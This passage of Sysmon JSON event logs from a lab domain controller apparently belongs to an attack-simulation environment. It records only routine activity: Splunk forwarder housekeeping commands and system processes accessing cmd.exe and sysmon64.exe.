Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3586,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.954\r\nProcessGuid: {41C8662E-1FF6-5F25-0000-0010638B0500}\r\nProcessId: 4336\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2>&1\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.954","ProcessGuid":"{41C8662E-1FF6-5F25-0000-0010638B0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2&gt;&amp;1","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3587,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010638B0500}\r\nTargetProcessId: 4336\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd46|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010638B0500}","TargetProcessId":"4336","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd46|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3588,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010638B0500}\r\nTargetProcessId: 4336\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010638B0500}","TargetProcessId":"4336","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3589,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3590,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3591,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3592,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3593,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3594,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 